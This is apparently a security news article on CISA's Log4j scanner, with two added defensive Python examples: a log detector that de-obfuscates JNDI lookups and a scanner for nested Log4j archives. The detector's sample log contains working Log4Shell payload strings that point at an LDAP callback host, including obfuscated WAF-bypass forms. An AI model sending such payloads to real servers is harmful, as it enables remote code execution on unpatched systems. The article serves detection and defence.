Log4j Vulnerability Scanning Tool Released by CISA

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released a scanner that can be used to identify web services affected by the two recently disclosed Apache Log4j remote code execution vulnerabilities, CVE-2021-44228 (Log4Shell) and CVE-2021-45046. Both have been fixed, along with a further denial-of-service vulnerability (CVE-2021-45105), in Log4j version 2.17.0.

The scanner, available on GitHub, was assembled with help from the open source community and has been updated by CISA in collaboration with the broader cybersecurity community. It is built on a modified version of the Log4j scanner developed by the cybersecurity company FullHunt, with assistance from Philipp Klaus, Moritz Bechler, and other members of the open source community.

The tool can be used to scan network hosts for exposure to the remote code execution vulnerabilities and to identify web application firewall (WAF) bypasses that threat actors could use to achieve code execution. According to CISA, it supports DNS callback for vulnerability discovery and validation, fuzzing of HTTP POST data parameters, fuzzing of JSON data parameters, and scanning of lists of URLs. One caveat for anyone relying on it: DNS callback detection only fires if the target can resolve an externally controlled hostname, so a vulnerable host that is blocked from making outbound DNS queries will not be reported by that method.
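The WAF bypasses the tool probes for exist because Log4j resolves nested `${...}` lookups before it ever sees the `jndi:` prefix, so a filter that matches only the literal string `${jndi:` is blind to `${${lower:j}ndi:...}`, `${${::-j}ndi:...}` and similar forms. The detector below is an added example written for this article, not code from CISA's tool or from FullHunt: it reduces the common obfuscation forms (nested lookups, `${key:-default}` defaults, `lower`/`upper` lookups, and one layer of URL encoding) to their resolved form and then looks for a JNDI lookup. The log lines are constructed for the example and the function names are my own.

```python
import re
import urllib.parse

# An innermost ${...} lookup: its body contains no further '$', '{' or '}'.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup once obfuscation has been stripped (the prefix is case-insensitive in Log4j).
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve_lookup(body: str):
    """Evaluate one innermost lookup body the way Log4j's StrSubstitutor does for the
    forms attackers use to dodge WAFs. Returns None for lookups that cannot be
    evaluated offline (jndi:, sys:, date:, ...), so the caller leaves them in place."""
    prefix, sep, rest = body.partition(":")
    if sep and prefix.lower() == "lower":
        return rest.lower()
    if sep and prefix.lower() == "upper":
        return rest.upper()
    # ${anything:-default}: an unknown key (or an empty one, as in ${::-j})
    # evaluates to the text after ':-'.
    if ":-" in body:
        return body.split(":-", 1)[1]
    return None


def normalize_lookups(text: str) -> str:
    """Strip one layer of URL encoding, then resolve innermost lookups until
    nothing further can be evaluated. Terminates because a resolved body never
    reintroduces '${'."""
    text = urllib.parse.unquote(text)
    while True:
        changed = False

        def _sub(m):
            nonlocal changed
            resolved = _resolve_lookup(m.group(1))
            if resolved is None:
                return m.group(0)
            changed = True
            return resolved

        text = _INNER.sub(_sub, text)
        if not changed:
            return text


def is_jndi_probe(text: str) -> bool:
    """True if the text carries a JNDI lookup after de-obfuscation."""
    return _JNDI.search(normalize_lookups(text)) is not None


def scan_log(log_text: str):
    """Return (line number, normalized line) for every line carrying a JNDI lookup."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        norm = normalize_lookups(line)
        if _JNDI.search(norm):
            hits.append((lineno, norm))
    return hits


# Constructed sample access log (Apache combined format); addresses are documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"
203.0.113.9 - - [10/Dec/2021:12:00:03 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F198.51.100.7%2Fb%7D HTTP/1.1" 200 512 "-" "curl/7.79"
203.0.113.9 - - [10/Dec/2021:12:00:04 +0000] "POST /api HTTP/1.1" 200 12 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.7/c}"
203.0.113.2 - - [10/Dec/2021:12:00:05 +0000] "GET /?d=${date:yyyy} HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for lineno, norm in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {norm}")
```

Lines 2, 3 and 4 are reported, including the URL-encoded and the `${::-x}` letter-by-letter forms, while the harmless `${date:yyyy}` on line 5 is not. The normalizer only handles one layer of URL encoding and the lookup types shown; a production detector should also decode JSON and base64-carried bodies, which the page's scanner fuzzes but this example does not cover.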

Shortly after the disclosure of the Log4Shell zero-day vulnerability, a broad range of threat actors began scanning for vulnerable applications and cloud services and have been exploiting the flaw to gain access to networks for a variety of malicious purposes. CISA initially gave all Federal Civilian Executive Branch agencies until December 24 to patch the vulnerabilities, and has released mitigation guidance covering all three vulnerabilities to prevent exploitation.

Several other Log4j vulnerability scanners have been released, including the CrowdStrike Archive Scan Tool, but many of the scanners made public fail to identify every instance of Log4j, particularly vulnerable copies bundled inside packaged software in production environments, where the library can sit several archives deep inside other files. These tools help to find vulnerable Log4j code, but no single one of them is guaranteed to identify every instance, so results from one scanner should be cross-checked against another or against a software inventory.
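Scanners miss nested copies because a JAR inside a WAR inside an EAR is three ZIP archives deep, and the file listing of the outer archive says nothing about Log4j. The scanner below is an added example written for this article, not CrowdStrike's tool or CISA's: it recurses into nested archives in memory, reads the Maven `pom.properties` that log4j-core ships with to obtain the version, and also looks for `JndiLookup.class` so that shaded or relocated copies without `pom.properties` are still reported. The sample EAR is constructed inside the example, and the `is_fixed` rule is my simplification of the Apache advisory: it treats 2.17.0 and the 2.12.3 and 2.3.1 backports as carrying the fixes for the three CVEs named above.

```python
import io
import os
import re
import zipfile

ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
# log4j-core ships its Maven coordinates at this path; the 'version=' line is what we need.
POM_RE = re.compile(r"META-INF/maven/org\.apache\.logging\.log4j/log4j-core/pom\.properties$")
# The class behind CVE-2021-44228, matched by suffix so relocated (shaded) copies count too.
JNDI_CLASS_SUFFIX = "/lookup/JndiLookup.class"


def version_tuple(version: str):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 9)."""
    return tuple(int(x) for x in re.findall(r"\d+", version)[:3])


def is_fixed(version: str) -> bool:
    """True if the build carries the fixes for CVE-2021-44228, -45046 and -45105:
    2.17.0 for Java 8+, plus the 2.12.3 (Java 7) and 2.3.1 (Java 6) backports.
    Assumed simplification of the Apache advisory, for this example only."""
    t = version_tuple(version)
    return t >= (2, 17, 0) or t in {(2, 12, 3), (2, 3, 1)}


def _version_from_pom(text: str):
    for line in text.splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def scan_archive(data: bytes, path: str = "<root>"):
    """Recursively inspect a ZIP-based archive held in memory and report every
    embedded log4j-core, however deeply it is nested."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        version = None
        for name in names:
            if POM_RE.search(name):
                version = _version_from_pom(zf.read(name).decode("utf-8", "replace"))
        jndi_present = any(n.endswith(JNDI_CLASS_SUFFIX) for n in names)
        if version is not None or jndi_present:
            findings.append({
                "path": path,
                "version": version,
                "jndi_lookup_present": jndi_present,
                # A copy with JndiLookup but no recoverable version is treated as suspect.
                "needs_attention": version is None or not is_fixed(version),
            })
        for name in names:
            if name.lower().endswith(ARCHIVE_EXT):
                try:
                    findings.extend(scan_archive(zf.read(name), f"{path}!/{name}"))
                except zipfile.BadZipFile:
                    continue  # not really an archive despite its extension
    return findings


def scan_directory(root: str):
    """Scan every archive below a directory on disk (not exercised by the sample)."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if fn.lower().endswith(ARCHIVE_EXT):
                full = os.path.join(dirpath, fn)
                with open(full, "rb") as fh:
                    try:
                        findings.extend(scan_archive(fh.read(), full))
                    except zipfile.BadZipFile:
                        continue
    return findings


def _jar(entries: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def build_sample_ear() -> bytes:
    """Constructed fixture: an EAR holding a WAR that carries a vulnerable
    log4j-core 2.14.1 three levels down, plus a fixed 2.17.1 one level down."""
    pom = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
    cls = "org/apache/logging/log4j/core" + JNDI_CLASS_SUFFIX
    old = _jar({pom: "version=2.14.1\nartifactId=log4j-core\n", cls: b"\xca\xfe\xba\xbe"})
    new = _jar({pom: "version=2.17.1\nartifactId=log4j-core\n", cls: b"\xca\xfe\xba\xbe"})
    war = _jar({"WEB-INF/lib/log4j-core-2.14.1.jar": old})
    return _jar({"app.war": war, "lib/log4j-core-2.17.1.jar": new, "README.txt": "sample"})


if __name__ == "__main__":
    for f in scan_archive(build_sample_ear(), "sample.ear"):
        flag = "ATTENTION" if f["needs_attention"] else "ok"
        print(f"{flag:9} {f['version'] or '?':8} jndi={f['jndi_lookup_present']}  {f['path']}")
```

Run on the constructed EAR, the 2.14.1 copy is reported with its full nested path (`sample.ear!/app.war!/WEB-INF/lib/log4j-core-2.14.1.jar`) while the 2.17.1 copy is listed as fixed. Note that `JndiLookup.class` is still present in fixed releases, so its presence alone is not a verdict; it is the fallback signal for copies whose version cannot be read.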

Author: Richard Anderson

Richard Anderson is the Editor-in-Chief of NetSec.news